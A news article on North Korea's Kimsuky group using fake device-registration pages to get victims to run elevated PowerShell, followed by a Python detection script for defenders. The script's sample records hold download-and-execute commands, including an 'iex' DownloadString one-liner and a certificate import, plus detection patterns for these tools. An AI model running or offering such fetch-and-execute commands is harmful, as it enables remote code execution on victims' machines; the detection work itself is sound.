North Korean Hackers Trick Users into Running Their Own Malware Through PowerShell

North Korean Hackers Adopt New Social Engineering Tactic

The North Korean state-sponsored hacking group Kimsuky (also known as Emerald Sleet or Velvet Chollima) has implemented a new social engineering strategy inspired by ClickFix campaigns. Microsoft’s Threat Intelligence team has identified this sophisticated attack pattern targeting international organizations.

The attack begins with threat actors posing as South Korean government officials to establish trust with potential victims. Once rapport is built, they send spear-phishing emails containing PDF attachments. Victims attempting to access these documents are redirected to a fraudulent device registration page, where they’re instructed to execute PowerShell commands with administrator privileges.

The malicious code deploys a browser-based remote desktop tool and installs a certificate using a predetermined PIN, ultimately registering the victim’s device with the attacker’s server. This grants hackers direct access for data theft.
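The chain above (an elevated PowerShell session that fetches a remote tool, touches the certificate store and spawns a process) leaves a recognisable footprint in PowerShell script-block logging. The script below is an added illustration for defenders, not code from the article or from Microsoft: it triages a handful of constructed script-block records (Event ID 4104 style, fields simplified to `user`, `elevated`, `script`) with heuristics chosen for this example. The rule names, the scoring weights, the alert threshold and every sample command line are assumptions made here; the `placeholder.invalid` hostnames are deliberate placeholders.

```python
"""Triage PowerShell script-block events for ClickFix-style 'paste and run' activity.

Heuristics written for this example (not taken from the article): an elevated
session that fetches remote content and then writes to the certificate store or
spawns a process scores high; a single benign match does not.
"""
import re
from dataclasses import dataclass, field

# Rule name -> regex applied to the decoded script text (case-insensitive).
RULES = {
    "remote_fetch": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|"
        r"Net\.WebClient|Start-BitsTransfer|curl|wget)\b", re.I),
    "cert_store_write": re.compile(
        r"(certutil(\.exe)?\s+.*-(addstore|importpfx)|Import-Certificate|Import-PfxCertificate)", re.I),
    "dynamic_exec": re.compile(r"\b(Invoke-Expression|iex|Start-Process|saps)\b", re.I),
    "obfuscation": re.compile(r"(-EncodedCommand|-enc\b|-ec\b|FromBase64String)", re.I),
}

# Constructed sample records; these are not real telemetry.
SAMPLE_EVENTS = [
    {"user": "alice", "elevated": False,
     "script": r"Get-ChildItem C:\Reports | Sort-Object LastWriteTime"},
    {"user": "bob", "elevated": True,
     "script": r"Invoke-WebRequest -Uri https://placeholder.invalid/rd-agent.zip -OutFile $env:TEMP\rd.zip; "
               r"Expand-Archive $env:TEMP\rd.zip $env:TEMP\rd; Start-Process $env:TEMP\rd\setup.exe"},
    {"user": "carol", "elevated": True,
     "script": r"Invoke-WebRequest -Uri https://placeholder.invalid/dev.pfx -OutFile $env:TEMP\dev.pfx; "
               r"Import-PfxCertificate -FilePath $env:TEMP\dev.pfx -CertStoreLocation Cert:\LocalMachine\My -Password $pin"},
    {"user": "dave", "elevated": False,
     "script": r"iex (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/x.ps1')"},
    {"user": "frank", "elevated": False,
     "script": r"Start-Process notepad.exe"},
]


@dataclass
class Finding:
    user: str
    elevated: bool
    rules: list = field(default_factory=list)
    score: int = 0


def score_event(event):
    """Return a Finding for one script-block record, or None when no rule matched."""
    hits = [name for name, rx in RULES.items() if rx.search(event["script"])]
    if not hits:
        return None
    # One point per matched rule, plus one when the session was elevated:
    # the lure described in the article explicitly asks for administrator rights.
    score = len(hits) + (1 if event.get("elevated") else 0)
    return Finding(event["user"], bool(event.get("elevated")), hits, score)


ALERT_THRESHOLD = 2  # assumed value for this example; tune against real baselines


def triage(events, threshold=ALERT_THRESHOLD):
    """Return findings at or above the threshold, highest score first (stable order otherwise)."""
    findings = [f for f in map(score_event, events) if f is not None]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.user:<6} elevated={f.elevated!s:<5} score={f.score} rules={','.join(f.rules)}")
```

With these constructed records the two elevated download-then-install sessions score 3 and the unprivileged download-and-`iex` one scores 2, while a lone `Start-Process notepad.exe` stays below the threshold. In production the same logic would read real 4104 records (and the elevation flag from the session or process token) rather than the inline list.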

Since January 2025, these targeted attacks have affected organizations across North America, South America, Europe, and East Asia in the following sectors:
– International affairs organizations
– NGOs
– Government agencies
– Media companies

Microsoft has alerted affected customers and emphasizes the importance of treating unsolicited communications with extreme caution. This adaptation of ClickFix tactics by a nation-state actor demonstrates the method’s effectiveness in cyber espionage operations. Users are strongly advised against executing unknown code with administrator privileges, particularly when copied from online sources.